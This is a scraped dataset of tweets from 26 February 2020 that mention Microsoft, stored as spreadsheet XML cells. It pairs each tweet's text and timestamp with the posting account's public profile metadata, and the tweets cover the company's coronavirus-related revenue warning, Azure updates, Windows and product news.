    <t>{'id': 1194585150220357633, 'id_str': '1194585150220357633', 'name': 'Zaijku Hiozza', 'screen_name': 'zaijku', 'location': 'New york', 'description': 'music sports news travel fashion social media blogging', 'url': 'https://t.co/pKAYjutyjT', 'entities': {'url': {'urls': [{'url': 'https://t.co/pKAYjutyjT', 'expanded_url': 'https://bestdailydeals.eu/', 'display_url': 'bestdailydeals.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 342, 'friends_count': 0, 'listed_count': 2, 'created_at': 'Wed Nov 13 11:58:01 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1893, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194586896724303873/UZfwqMxY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194586896724303873/UZfwqMxY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1194585150220357633/1573646687',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</si>
  <si>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22:12:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/Epm9t0DsCD #Microsoft #Azure #Cloud https://t.co/SY8JB2Bu6B</t>
  </si>
  <si>
    <t>Wed Feb 26 22:11:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft falls in after hours trading after saying doesnt expect to meet quarterly revenue guidance https://t.co/Pl4oNHYoXp $MSFT is an all session stock at @IGcom https://t.co/ftMB9ydsrx</t>
  </si>
  <si>
    <t>{'id': 2422263679, 'id_str': '2422263679', 'name': 'Sara Walker', 'screen_name': 'SaraWalker_IG', 'location': 'London', 'description': 'IG Head of Engagement, journalist. Trade ideas, trading insight and market analysis. Views are my own and not those of IG. Losses can exceed deposits', 'url': 'http://www.ig.com/uk', 'entities': {'url': {'urls': [{'url': 'http://www.ig.com/uk', 'expanded_url': None, 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1598, 'friends_count': 402, 'listed_count': 39, 'created_at': 'Tue Apr 01 15:18:56 +0000 2014', 'favourites_count': 38, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2579,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'http://pbs.twimg.com/profile_images/636927110804860928/RaGsMmf0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/636927110804860928/RaGsMmf0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2422263679/1578393976',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</si>
  <si>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Wed Feb 26 22:10:59 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Cost Management + Billing updates  February 2020. #Microsoft #Cloud #MSFTadvocate #Management #Monitoring
https://t.co/6si1pHXwFv</t>
  </si>
  <si>
    <t>Wed Feb 26 22:10:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says it will miss revenue guidance for Windows business segment due to... https://t.co/TvyVq9HYZP</t>
  </si>
  <si>
    <t>Wed Feb 26 22:10:07 +0000 2020</t>
  </si>
  <si>
    <t>#ObliqueRAT is the new #malware that can reach us through a simple #Word file. This is a #Trojan that, in principle, is aimed at organizations, but that could also affect particular users. It relies on malicious #Microsoft Word documents to spread its attacks.
#CyberSecurity https://t.co/zmm6lwLIgb</t>
  </si>
  <si>
    <t>{'id': 763828169853898753, 'id_str': '763828169853898753', 'name': 'Tecbound Technology', 'screen_name': 'Tecboundtech', 'location': 'Calgary, Alberta', 'description': 'IT Managed Service Provider', 'url': 'https://t.co/apLp7WuJgx', 'entities': {'url': {'urls': [{'url': 'https://t.co/apLp7WuJgx', 'expanded_url': 'http://www.tecbound.com', 'display_url': 'tecbound.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Thu Aug 11 20:03:21 +0000 2016', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/864946483015016448/2bnqAI8p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/864946483015016448/2bnqAI8p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/763828169853898753/1541431210', 'profile_link_color': '92B845',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</si>
  <si>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22:10:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft
#Covid_19
#Corona
#coronavirues
#BREAKING Microsoft says revenue to take a hit from coronavirus epidemic 
Source: @AFP</t>
  </si>
  <si>
    <t>{'id': 1224702748232495110, 'id_str': '1224702748232495110', 'name': 'Alexander W', 'screen_name': 'NewsLife2020', 'location': 'Sverige', 'description': 'Welcome to me ðŸ˜Š My name is Alexander i come from Sweden and 22 Years old! I like to follow news so here i gonna share news :)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 896, 'listed_count': 0, 'created_at': 'Tue Feb 04 14:34:31 +0000 2020', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2996, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224703366204403715/J9tk5GjT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224703366204403715/J9tk5GjT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224702748232495110/1580827020',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</si>
  <si>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 $MSFT warns it will miss guidance for segment that includes Windows because of #Coronavirus https://t.co/BI4Ji70T27 https://t.co/T8j32JmBIQ</t>
  </si>
  <si>
    <t>Wed Feb 26 22:09:10 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020 https://t.co/w1D3x11ZbR #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:08:50 +0000 2020</t>
  </si>
  <si>
    <t>Sometimes I felt sad, like being on a playground &amp;amp; nobody wants to play with you. @Ann_Carrizales discussing the effects of #PTSD on #PoliceOfficers in #TheWoundedBlue. NOW PLAYING on #iTunes #Amazon #GooglePlay #Microsoft! @WoundedBlue 
Visit: https://t.co/NWYdC0a6vY https://t.co/gD51xUBFJ7</t>
  </si>
  <si>
    <t>Wed Feb 26 22:06:06 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Cost Management + Billing updates  February 2020 https://t.co/8fPOhGkADd via @hybrid_ts #Microsoft https://t.co/CWoU1sOQY0</t>
  </si>
  <si>
    <t>Wed Feb 26 22:05:13 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from FH-Networking, LLC. https://t.co/z385bZ5zyU</t>
  </si>
  <si>
    <t>Wed Feb 26 22:05:10 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN SSTP load balancing with the @KempTech LoadMaster load balancer. #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/bLwmfr1iGg</t>
  </si>
  <si>
    <t>Wed Feb 26 22:04:48 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT closes within prior day's range: https://t.co/nmkhv2phEi
Sentiment: Neutral #MSFT #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 22:03:52 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Duo will let you "Peek" at notifications, according to leaked video. https://t.co/PFai52SoHF #microsoft #gadgets #technology #geek #windows10  $MSFT https://t.co/KXfJQ4izC1</t>
  </si>
  <si>
    <t>{'id': 19600067, 'id_str': '19600067', 'name': 'TechEBlog', 'screen_name': 'techeblog', 'location': 'Los Angeles', 'description': 'Providing subscribers with the latest technology, gadget, and geek-related links on the web.', 'url': 'http://t.co/ot7wjsewd5', 'entities': {'url': {'urls': [{'url': 'http://t.co/ot7wjsewd5', 'expanded_url': 'http://www.techeblog.com', 'display_url': 'techeblog.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48592, 'friends_count': 17, 'listed_count': 519, 'created_at': 'Tue Jan 27 16:32:20 +0000 2009', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 34950,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'http://pbs.twimg.com/profile_images/526350299674324992/8M3S2ja3_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/526350299674324992/8M3S2ja3_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19600067/1414326597',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</si>
  <si>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22:03:00 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft      VIA @mscloud    Device based Conditional Access (video)  https://t.co/bwRdRcKzra</t>
  </si>
  <si>
    <t>Wed Feb 26 22:02:29 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020  https://t.co/fIKxNUG5fB #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Wed Feb 26 22:02:11 +0000 2020</t>
  </si>
  <si>
    <t>Chrome vs Edge: #Google is afraid of #Microsofts browser https://t.co/7sDveg6v3o #TechJunkieNews https://t.co/zwHHTaVkh9</t>
  </si>
  <si>
    <t>Wed Feb 26 22:00:37 +0000 2020</t>
  </si>
  <si>
    <t>This is a great idea!
Using AI to improve debt collection
https://t.co/Piguipesrt
#microsoft #wednesdaywisdom #ai #digital</t>
  </si>
  <si>
    <t>Wed Feb 26 22:00:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft confirms #Xbox Series X will support four generations of #gaming (via @Verge)
https://t.co/HVHazqSrxr https://t.co/duAhl3MFqs</t>
  </si>
  <si>
    <t>{'id': 2786730595, 'id_str': '2786730595', 'name': 'Insane Tech', 'screen_name': 'InsaneTechUK', 'location': 'United Kingdom', 'description': 'We are crazy about tech ðŸ¤ª', 'url': 'https://t.co/tdxMZgWQv3', 'entities': {'url': {'urls': [{'url': 'https://t.co/tdxMZgWQv3', 'expanded_url': 'http://www.paulwilson.tech', 'display_url': 'paulwilson.tech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 38820, 'friends_count': 40273, 'listed_count': 307, 'created_at': 'Tue Sep 02 21:12:13 +0000 2014', 'favourites_count': 107, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5525, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7F0000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/713457673182789632/LFmP_no0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/713457673182789632/LFmP_no0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2786730595/1458936523', 'profile_link_color': '7F0000',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</si>
  <si>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22:00:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Slides After Cutting Personal Computing Guidance Due To #Coronavirus; #Intel Dragged Lower $INTC $MSFT https://t.co/BiO1ocXhNA</t>
  </si>
  <si>
    <t>{'id': 1001192245, 'id_str': '1001192245', 'name': 'TalkMarkets', 'screen_name': 'TalkMarkets', 'location': '', 'description': 'Financial content thatâ€™s customized, optimized, socialized. #talkmarkets', 'url': 'http://t.co/iL0trK2OzM', 'entities': {'url': {'urls': [{'url': 'http://t.co/iL0trK2OzM', 'expanded_url': 'http://www.TalkMarkets.com', 'display_url': 'TalkMarkets.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3492, 'friends_count': 1076, 'listed_count': 610, 'created_at': 'Mon Dec 10 07:55:31 +0000 2012', 'favourites_count': 461, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 238900,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'http://pbs.twimg.com/profile_images/876851529990512641/zRRSWFBW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876851529990512641/zRRSWFBW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1001192245/1570606424',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</si>
  <si>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Feb 26 22:00:04 +0000 2020</t>
  </si>
  <si>
    <t>WorldWide Delivery.
#Google #Logitech #Lenovo #Microsoft #Jamboard #Chromebox #Surface
https://t.co/NoPRT6FsS4 https://t.co/GaW83CYd7L</t>
  </si>
  <si>
    <t>Wed Feb 26 21:57:33 +0000 2020</t>
  </si>
  <si>
    <t>Financials of #Microsoft #MSFT $MSFT
 https://t.co/EuiWJjaOr8</t>
  </si>
  <si>
    <t>{'id': 975337043944407040, 'id_str': '975337043944407040', 'name': 'Finscreener.com', 'screen_name': 'Finscreener_com', 'location': '', 'description': 'Your world of finance', 'url': 'https://t.co/E6pb07dVEK', 'entities': {'url': {'urls': [{'url': 'https://t.co/E6pb07dVEK', 'expanded_url': 'https://www.finscreener.com/', 'display_url': 'finscreener.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 185, 'friends_count': 157, 'listed_count': 7, 'created_at': 'Sun Mar 18 11:44:06 +0000 2018', 'favourites_count': 153, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6246, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/976083323347984384/71mUunXo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/976083323347984384/71mUunXo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/975337043944407040/1580124726',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</si>
  <si>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21:57:26 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Hackers Stole Crypto Using Victims Emails
https://t.co/3fECQGKXS3
 #CryptoTicker  #cryptocurrency  #Hack  #microsoft  https://t.co/3fECQGKXS3</t>
  </si>
  <si>
    <t>{'id': 883260123241689089, 'id_str': '883260123241689089', 'name': 'CryptoTicker', 'screen_name': 'CryptotickerIo', 'location': 'Berlin, Germany', 'description': 'CryptoTicker is a news-platform around #crypto, #blockchain and #futurism. Sprichst Du Deutsch? âž¡ï¸  @CryptotickerDE', 'url': 'https://t.co/CKGNzRSUZV', 'entities': {'url': {'urls': [{'url': 'https://t.co/CKGNzRSUZV', 'expanded_url': 'https://cryptoticker.io/', 'display_url': 'cryptoticker.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1056, 'friends_count': 621, 'listed_count': 14, 'created_at': 'Fri Jul 07 09:43:18 +0000 2017', 'favourites_count': 322, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1177,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'http://pbs.twimg.com/profile_images/1088089024626081793/aIeXgrhB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088089024626081793/aIeXgrhB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/883260123241689089/1548327210',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</si>
  <si>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21:57:22 +0000 2020</t>
  </si>
  <si>
    <t>Taking this  to a new level. And this time, we brought our friends from @SevOneInc and @ParkMyCloud with us... #Cloud #Kubernetes #DevOps #microservices #containers #Cisco #Microsoft #AWS #IBM #Google https://t.co/ye4sOi5LKx</t>
  </si>
  <si>
    <t>{'id': 546633001, 'id_str': '546633001', 'name': 'Barry Howard', 'screen_name': 'bazza325', 'location': 'Windsor', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Fri Apr 06 08:18:02 +0000 2012', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1390,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'http://pbs.twimg.com/profile_images/1125037002687164417/8G1QwcDi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125037002687164417/8G1QwcDi_normal.jpg',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</si>
  <si>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21:48:02 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 could get a new Start menu as Microsoft kills off one of its most useless features https://t.co/cbjS6HezSj #Microsoft finally killing off Live Tiles for good #Windows10 https://t.co/iDWgPNiA01</t>
  </si>
  <si>
    <t>{'id': 948014469044678656, 'id_str': '948014469044678656', 'name': 'Igor Os', 'screen_name': 'igor_os777', 'location': 'Delaware, USA', 'description': 'Experienced #Unix/#Linux SysAdmin with over twenty years background in Systems Analysis, Problem Resolution, Application Support, and Process #Automation.', 'url': 'https://t.co/fFtPhqGHsR', 'entities': {'url': {'urls': [{'url': 'https://t.co/fFtPhqGHsR', 'expanded_url': 'https://igoros.com', 'display_url': 'igoros.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4938, 'friends_count': 2024, 'listed_count': 74, 'created_at': 'Tue Jan 02 02:13:57 +0000 2018', 'favourites_count': 28069, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28085,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'http://pbs.twimg.com/profile_images/1229141138264686594/ql37HCpk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229141138264686594/ql37HCpk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948014469044678656/1581885059',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</si>
  <si>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21:44:23 +0000 2020</t>
  </si>
  <si>
    <t>A former #Microsoft engineer stole more than $10M from the company https://t.co/t2E1V78Ikc</t>
  </si>
  <si>
    <t>Wed Feb 26 21:44:12 +0000 2020</t>
  </si>
  <si>
    <t>Teaching 100 teachers: What this teenager is doing with #MinecraftEdu is mind-blowing https://t.co/HikMGiEbRh  #microsoft #MicrosoftEDU @PlayCraftLearn @SELinEdu1</t>
  </si>
  <si>
    <t>{'id': 33184994, 'id_str': '33184994', 'name': 'Mark Sparvell ðŸŒðŸŒðŸŒŽ #sparvellous', 'screen_name': 'sparvell', 'location': 'Kirkland, Washington State', 'description': 'Principal, Teacher, Global Edu Leader #technology #innovation #edtech #SEL #MicrosoftEdu. All opinions expressed are my own.  https://t.co/xqT3CTc7QH ðŸ¦˜', 'url': 'https://t.co/xKuFNa1LMJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/xKuFNa1LMJ', 'expanded_url': 'http://www.sparvell.com', 'display_url': 'sparvell.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/xqT3CTc7QH', 'expanded_url': 'http://bit.ly/SELinEdu', 'display_url': 'bit.ly/SELinEdu', 'indices': [126, 149]}]}}, 'protected': False, 'followers_count': 7473, 'friends_count': 6958, 'listed_count': 288, 'created_at': 'Sun Apr 19 12:01:03 +0000 2009', 'favourites_count': 7428, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14076,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'http://pbs.twimg.com/profile_images/1229966902161629184/2xOYmzZI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229966902161629184/2xOYmzZI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33184994/1582082005',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</si>
  <si>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21:44:11 +0000 2020</t>
  </si>
  <si>
    <t>Toady we had a great learning session with the #NSCON team at @WeWork office T8 in Frankfurt and remote via #Microsoft #Teams. We reviewed some #CiscoLiveEurope topics. Big thanks to all presenters. Some impression from the after work dinner with the onsite attendants. #CLEUR https://t.co/BY2QJAwwDQ</t>
  </si>
  <si>
    <t>{'id': 126877057, 'id_str': '126877057', 'name': 'Daniel Kuhl', 'screen_name': 'daniel1820815', 'location': 'Bad Nauheim, Hessen', 'description': 'Owner&amp;CEO of NSCON GmbH â€¢ IT Network&amp;Security Engineer â€¢ Tesla Model 3 Driver â€¢ Save the planet â€¢ Tweets are my own', 'url': 'https://t.co/T8FeUZEDux', 'entities': {'url': {'urls': [{'url': 'https://t.co/T8FeUZEDux', 'expanded_url': 'https://www.nscon.de', 'display_url': 'nscon.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 240, 'listed_count': 6, 'created_at': 'Sat Mar 27 08:03:05 +0000 2010', 'favourites_count': 888, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1238,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'http://pbs.twimg.com/profile_images/679621667774164992/o2iiV0R3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/679621667774164992/o2iiV0R3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/126877057/1493630797',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</si>
  <si>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21:42:01 +0000 2020</t>
  </si>
  <si>
    <t>The Office #Office #TheOffice #SmallBusiness #Business #Company #Work #RealEstate #SebestyenGlynnAndLeeLLC #SebestyenGlynnAndLee #ZakkWylde #Beats #BeatsByDre #Microsoft #Windows #Piqua #Ohio https://t.co/OkJ8wYveof</t>
  </si>
  <si>
    <t>{'id': 415883115, 'id_str': '415883115', 'name': 'Rain Man', 'screen_name': 'sandors24', 'location': 'Piqua, OH', 'description': 'Probably eating Ramen &amp; drinking V8. \nFollow sandors24 on Instagram .', 'url': 'https://t.co/tYJKgNPll8', 'entities': {'url': {'urls': [{'url': 'https://t.co/tYJKgNPll8', 'expanded_url': 'https://www.instagram.com/sandors24/', 'display_url': 'instagram.com/sandors24/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3345, 'friends_count': 4975, 'listed_count': 32, 'created_at': 'Fri Nov 18 23:15:46 +0000 2011', 'favourites_count': 83146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 56960,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'http://pbs.twimg.com/profile_images/1230375941924380672/Zx6nRq1o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230375941924380672/Zx6nRq1o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/415883115/1581994861',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</si>
  <si>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Feb 26 21:41:24 +0000 2020</t>
  </si>
  <si>
    <t>Learn more about some of our favorite cloud storage solutions!
https://t.co/JBAEV4Zf7A
#tech #technology #techreview #cloud #Microsoft #google</t>
  </si>
  <si>
    <t>{'id': 1153079933284966400, 'id_str': '1153079933284966400', 'name': 'Grounds Tech Talk', 'screen_name': 'TalkGrounds', 'location': 'United States', 'description': 'Here to provide you with a hot cup of #technews', 'url': 'https://t.co/kAKd9uIOGX', 'entities': {'url': {'urls': [{'url': 'https://t.co/kAKd9uIOGX', 'expanded_url': 'https://groundstechtalk.blogspot.com/', 'display_url': 'groundstechtalk.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 212, 'listed_count': 1, 'created_at': 'Sun Jul 21 23:10:54 +0000 2019', 'favourites_count': 361, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 195, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1221621400873492481/BG-oRTnI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221621400873492481/BG-oRTnI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1153079933284966400/1580180147',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</si>
  <si>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21:41:00 +0000 2020</t>
  </si>
  <si>
    <t>Education News -. Read more at https://t.co/ibvzvZjLAN. #microsoft https://t.co/U8MgqaUFwM https://t.co/7LHS4R4HBZ</t>
  </si>
  <si>
    <t>Wed Feb 26 21:40:54 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Qualitia Energy can accelerate your journey with #Microsoft #Azure. https://t.co/uCp3cJcWhX</t>
  </si>
  <si>
    <t>Wed Feb 26 21:40:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts sneaky plan to switch Chrome searches from #Google to Bing https://t.co/2ijynIVpLQ #TechJunkieNews https://t.co/zywwGOzCLn</t>
  </si>
  <si>
    <t>Wed Feb 26 21:39:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's #Azure Role-Based Certifications continue to evolve and more are being added soon. Which Azure role-based certification is right for you? https://t.co/4qGAdt1T1d #ITTraining #Cloud</t>
  </si>
  <si>
    <t>Wed Feb 26 21:39:44 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns it will miss revenue guidance for a key business segment that includes #Windows because of the impact of the #coronavirus on its business, via @CNBC: https://t.co/iPAHyl5cnR #tech #business https://t.co/P0j7Ch5870</t>
  </si>
  <si>
    <t>{'id': 543628583, 'id_str': '543628583', 'name': 'Marketing &amp; Sales Advisor to Global Tech Companies', 'screen_name': 'RobShiveley', 'location': '#PDX', 'description': 'I help leading global technology firms create compelling marketing and accelerate sales â€” work at https://t.co/sH0atgV5yZ â€” solely responsible for my tweets.', 'url': 'https://t.co/fKP8va7CvL', 'entities': {'url': {'urls': [{'url': 'https://t.co/fKP8va7CvL', 'expanded_url': 'https://www.linkedin.com/in/robshiveley/', 'display_url': 'linkedin.com/in/robshiveley/', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/sH0atgV5yZ', 'expanded_url': 'http://bridge.partners', 'display_url': 'bridge.partners', 'indices': [98, 121]}]}}, 'protected': False, 'followers_count': 6454, 'friends_count': 5269, 'listed_count': 956, 'created_at': 'Mon Apr 02 18:31:00 +0000 2012', 'favourites_count': 37545, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 61435,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'http://pbs.twimg.com/profile_images/883127049061191681/xaKgRW9l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/883127049061191681/xaKgRW9l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/543628583/1567205563',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</si>
  <si>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21:39:18 +0000 2020</t>
  </si>
  <si>
    <t>Dont want to spend time creating a new #database? No problem! #Microsoft Access templates are a quick and easy way to make a database. Choose the template that works for you and start inputting data right away! Questions? Give Arkware a call. https://t.co/rfpLfsknf0</t>
  </si>
  <si>
    <t>{'id': 705458504111230976, 'id_str': '705458504111230976', 'name': 'Arkware, Inc.', 'screen_name': 'Arkware', 'location': 'Edina, MN', 'description': 'Need to upgrade, customize, support or replace your Microsoft Access database?\nArkware provides Microsoft Access support and replacement services.', 'url': 'https://t.co/jdY8MLJt8C', 'entities': {'url': {'urls': [{'url': 'https://t.co/jdY8MLJt8C', 'expanded_url': 'http://www.arkware.com', 'display_url': 'arkware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 235, 'listed_count': 7, 'created_at': 'Thu Mar 03 18:23:08 +0000 2016', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 461,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'http://pbs.twimg.com/profile_images/771019692660195328/u4iqRWoe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/771019692660195328/u4iqRWoe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/705458504111230976/1472661657',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</si>
  <si>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21:38:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Windows 10 OS Start Menu To No Longer Feature Real-Time Information Giving Live Tiles 
https://t.co/UWuoYADeLT - #Windows10 https://t.co/BvwAAFlxSl</t>
  </si>
  <si>
    <t>Wed Feb 26 21:37:50 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to everyone who joined @meetdux and I this morning to discuss 6 Practical Tips to Mastering #Office365Groups. Enjoyed the questions and time together. Stay tuned for a recording and follow up blog post! #Microsoft #AvePoint #Microsoft365</t>
  </si>
  <si>
    <t>{'id': 21325860, 'id_str': '21325860', 'name': 'Mike McLean', 'screen_name': 'mikemcleanlive', 'location': 'Redmond, WA', 'description': 'Making Office 365 Groups the best collaboration platform on the planet. Passion for shipping great software.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 599, 'friends_count': 318, 'listed_count': 37, 'created_at': 'Thu Feb 19 18:41:54 +0000 2009', 'favourites_count': 458, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1123,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'http://pbs.twimg.com/profile_images/378800000860571518/g1DYalsh_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000860571518/g1DYalsh_normal.jpeg',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</si>
  <si>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21:36:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft tweaks fiscal Q3 guidance on #virus-related supply problems  https://t.co/V1VFXHkz4F</t>
  </si>
  <si>
